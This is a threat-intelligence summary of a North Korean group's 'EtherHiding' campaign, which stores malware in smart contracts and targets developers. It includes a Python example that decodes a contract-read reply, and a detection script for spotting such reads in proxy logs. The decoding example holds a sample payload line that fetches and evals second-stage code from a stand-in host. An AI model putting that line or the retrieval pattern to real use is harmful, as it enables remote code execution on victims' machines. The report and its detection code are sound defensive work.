# Full Report
Google security researchers said on Thursday that they observed a Pyongyang-backed hacking group, tracked as UNC5342, deploying a method known as EtherHiding — a way of embedding malicious code inside smart contracts on decentralized networks such as Ethereum and BNB Smart Chain.
# Analysis Summary
# Threat Actor: UNC5342
## Attribution & Identity
* **Attribution:** North Korean state-linked hacking group.
* **Known Aliases/Associations:** No aliases are given in the report. UNC5342 is discussed alongside UNC5142, a separate, financially motivated group that used EtherHiding earlier; UNC5342's use is the first observed adoption of the technique by a state-sponsored actor.
## Activity Summary
* Since February of the year the report was published, UNC5342 has been running social-engineering campaigns that deliver cryptocurrency-stealing malware.
* The core of the campaign involves luring developers (often in the cryptocurrency or tech industries) by presenting job-related files or coding challenges.
* They have adopted **EtherHiding**: embedding malicious code within smart contracts on public blockchains (e.g., Ethereum, BNB Smart Chain).
* Google researchers observed this as the first known instance of a nation-state adopting this blockchain-based malware delivery method.
## Tactics, Techniques & Procedures
* **C2/Delivery:** Public blockchains (Ethereum, BNB Smart Chain) host the malicious code inside smart contracts, which Google describes as "next-generation bulletproof hosting."
* **Execution:** Once a target opens the malicious file, a script inside it calls a smart contract on the chain to retrieve the encrypted code. A contract read is a query answered by a node, not a transaction: it costs no gas and leaves no record on the ledger, so the fetch itself never appears in on-chain data.
* **Payload Delivery:** The retrieved code deploys the **JadeSnow** loader, which in turn installs the **InvisibleFerret** backdoor.
* **Evasion/Persistence:** Code written into a contract on a public ledger cannot be taken down by a hosting provider or registrar, and no single server has to stay up. The attackers can swap or update the payload by sending a transaction that rewrites the contract's storage, without touching the loader already on victims' machines.
* **Anonymity:** Deploying and updating the contract requires nothing more than a funded wallet address, so the operators remain pseudonymous.
* **Interaction:** Although the code lives on permissionless blockchains, the victim-side script still has to reach the chain through centralized web services, such as public RPC gateways, and those are services defenders can monitor or block.
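What the "script contacts a smart contract" step looks like on the wire, as an added example that is not the actor's loader or any code from the report: the JSON-RPC `eth_call` request a client POSTs to an RPC gateway, and the ABI decoding of the `string` the contract hands back. The contract address, the choice of a getter named `get()` and the stored payload string are constructed for illustration; only the request shape and the ABI layout are real.

```python
"""Wire-level view of an EtherHiding fetch: the eth_call JSON-RPC request and
the ABI decoding of the string the contract returns.

Added example; not UNC5342's loader. The contract address, the getter name
and the payload string are constructed."""
import json

# Constructed: a hypothetical contract address and a getter named get().
# A selector is the first 4 bytes of keccak256(signature); for "get()" it is
# 0x6d4ce63c.
CONTRACT = "0x" + "ab" * 20
GET_SELECTOR = "6d4ce63c"


def build_eth_call(contract: str, selector_hex: str, request_id: int = 1) -> str:
    """JSON-RPC body a client POSTs to a gateway to read contract state.
    eth_call runs the getter on a node and returns the result; it is not a
    transaction, so it costs no gas and leaves nothing on the ledger."""
    body = {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": "0x" + selector_hex}, "latest"],
    }
    return json.dumps(body)


def abi_encode_string(s: str) -> str:
    """Encode a Solidity `string` return value the way a node reports it:
    32-byte offset (0x20), 32-byte length, then data padded to 32 bytes."""
    data = s.encode()
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    head = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + (head + padded).hex()


def abi_decode_string(result_hex: str) -> str:
    """Decode the `result` field of an eth_call response that returns a string,
    rejecting malformed offsets or lengths instead of slicing past the buffer."""
    raw = bytes.fromhex(result_hex.removeprefix("0x"))
    if len(raw) < 64:
        raise ValueError("result too short for an ABI string")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset points outside the payload")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length exceeds payload")
    return raw[start:start + length].decode()


def extract_payload(response_json: str) -> str:
    """Pull the string out of a full JSON-RPC response; raise on RPC errors."""
    resp = json.loads(response_json)
    if "error" in resp:
        raise RuntimeError(f"rpc error: {resp['error']}")
    return abi_decode_string(resp["result"])


if __name__ == "__main__":
    # Constructed stand-in for a gateway reply: the contract's stored string is
    # second-stage JavaScript that a real loader would hand to eval(). This
    # example stops at decoding and never executes it.
    stored = "fetch('https://example.invalid/stage2').then(r=>r.text()).then(eval)"
    reply = json.dumps({"jsonrpc": "2.0", "id": 1,
                        "result": abi_encode_string(stored)})
    print(build_eth_call(CONTRACT, GET_SELECTOR))
    print(extract_payload(reply))
```

The point to take from the request body is that nothing in it is unusual for a Web3 client: the same `eth_call` shape is what any wallet or dapp sends. The only network evidence of the fetch is the HTTPS POST to the gateway, which is why the "Interaction" bullet above matters for detection.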
## Targeting
* **Sectors:** Cryptocurrency and Technology industries (due to targeting developers).
* **Geography:** Not explicitly stated, but likely aiming for global cryptocurrency theft opportunities.
* **Victims:** Developers working in relevant industries who are tricked into downloading malicious job-related files or coding challenges.
## Tools & Infrastructure
* **Malware families used:** JadeSnow (loader), InvisibleFerret (persistent backdoor).
* **Infrastructure:** Public blockchains (Ethereum, BNB Smart Chain) used for code storage via smart contracts. Centralized web services used for interaction alongside the blockchain.
## Implications
* This marks a notable evolution in North Korean cyber operations: payload hosting has moved onto a decentralized ledger for resilience, which makes takedowns by law enforcement and security researchers much harder.
* The objective is large-scale financial gain through cryptocurrency theft.
## Mitigations
* Monitor or block the centralized web services (for example, public blockchain RPC gateways) that the delivery script must use to read the contract; that dependency is a chokepoint the decentralized hosting does not remove.
* Increase vigilance against social-engineering lures aimed at developers, in particular job-related files and "coding challenges." Any such project that retrieves and executes remote content at run time should be treated as hostile, even when the source looks legitimate, such as a blockchain contract.
* Defenders in the cryptocurrency space should extend smart-contract monitoring to the hosting abuse itself: contract reads issued from workstations or developer tooling whose returned data is script or an encoded blob rather than financial state, and contracts whose stored data is rewritten often.
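A detection sketch for that chokepoint, as an added example rather than anything from Google or the actor: it scans egress-proxy records for contract-read JSON-RPC calls (`eth_call`, `eth_getStorageAt`) issued by processes that should not be talking to a chain, and surfaces the contract address and function selector as pivots for an analyst. It assumes a proxy that logs request bodies after TLS inspection; the record layout, the process names, the hosts and every sample line are constructed.

```python
"""Egress-side detection for the mitigation above: the victim-side script
reads the contract through a centralized JSON-RPC gateway over HTTPS, so a
proxy that logs request bodies can flag contract reads from processes that
have no business issuing them.

Added example, not Google's or the actor's tooling. The record layout, the
process names and every sample line are constructed."""
import json

# Contract-state read methods in the Ethereum JSON-RPC API.
READ_METHODS = {"eth_call", "eth_getStorageAt"}
# Processes from which a contract read is expected on a developer workstation
# (assumption: tune to the environment; browsers and wallet apps belong here).
EXPECTED_READERS = {"chrome", "firefox", "msedge"}


def _record(ts, src, process, host, body):
    """Build one constructed proxy record; the body is kept as a raw string."""
    return json.dumps({"ts": ts, "src": src, "process": process, "host": host,
                       "body": "" if body is None else json.dumps(body)})


def _eth_call(to, data, rpc_id=1):
    return {"jsonrpc": "2.0", "id": rpc_id, "method": "eth_call",
            "params": [{"to": to, "data": data}, "latest"]}


SAMPLE_LOG = [
    # node running a downloaded "coding challenge" reads a contract: flag.
    _record("2025-02-10T09:14:03Z", "10.0.4.21", "node", "rpc.example.invalid",
            _eth_call("0x" + "ab" * 20, "0x6d4ce63c")),
    # Browser dapp traffic to the same gateway (balanceOf call): expected.
    _record("2025-02-10T09:14:05Z", "10.0.4.22", "chrome", "rpc.example.invalid",
            _eth_call("0x" + "cd" * 20, "0x70a08231" + "00" * 32)),
    # Batched request from python with a raw storage read inside: flag.
    _record("2025-02-10T09:15:40Z", "10.0.4.21", "python", "rpc.example.invalid",
            [{"jsonrpc": "2.0", "id": 7, "method": "eth_blockNumber", "params": []},
             {"jsonrpc": "2.0", "id": 8, "method": "eth_getStorageAt",
              "params": ["0x" + "ab" * 20, "0x0", "latest"]}]),
    # Empty body on an unrelated host: skipped, not an error.
    _record("2025-02-10T09:16:00Z", "10.0.4.23", "curl", "files.example.invalid", None),
]


def _calls(body: str):
    """Yield every JSON-RPC call object in a body, handling batches."""
    try:
        parsed = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return
    for item in parsed if isinstance(parsed, list) else [parsed]:
        if isinstance(item, dict) and "method" in item:
            yield item


def _contract_of(call: dict):
    """Return (contract, selector) for the read methods we care about."""
    params = call.get("params") or []
    if call["method"] == "eth_call" and params and isinstance(params[0], dict):
        data = str(params[0].get("data", ""))
        selector = data[:10] if data.startswith("0x") else None
        return params[0].get("to"), selector
    if call["method"] == "eth_getStorageAt" and params:
        return params[0], None
    return None, None


def scan(lines):
    """Return one finding per contract read issued by an unexpected process."""
    findings = []
    for line in lines:
        rec = json.loads(line)
        if rec["process"].lower() in EXPECTED_READERS:
            continue
        for call in _calls(rec["body"]):
            if call["method"] not in READ_METHODS:
                continue
            contract, selector = _contract_of(call)
            findings.append({"src": rec["src"], "process": rec["process"],
                             "host": rec["host"], "method": call["method"],
                             "contract": contract, "selector": selector})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The rule keys on the process rather than the gateway host on purpose: the gateways are legitimate services that browsers and wallets also use, so blocking them outright is rarely an option, whereas a contract read from `node` or `python` on a developer workstation running an unsolicited project is worth a look every time. The contract address in each finding is the pivot to a block explorer, where the stored data and its update history can be read directly.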